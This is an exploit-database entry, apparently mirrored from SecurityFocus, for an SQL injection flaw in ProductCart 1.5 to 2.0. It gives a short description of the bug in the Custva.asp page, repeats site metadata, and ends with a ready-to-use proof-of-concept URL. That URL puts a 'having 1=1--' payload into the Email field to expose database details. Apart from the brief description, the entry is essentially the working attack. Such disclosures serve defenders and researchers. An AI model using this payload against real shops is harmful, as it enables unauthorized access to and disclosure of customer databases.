ProductCart 1.5/1.6/2.0 - 'Custva.asp' SQL Injection
| EKU-ID: 28335 | CVE: | OSVDB-ID: |
| Author: Bosen | Published: 2003-07-04 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28335 | CVE: | OSVDB-ID: |
| Author: Bosen | Published: 2003-07-04 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/8103/info ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to reveal information relating to the underlying database; other attacks may also be possible. http://www.example.com/productcart/pc/Custva.asp?redirectUrl=&Email=%27+having+1 %3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit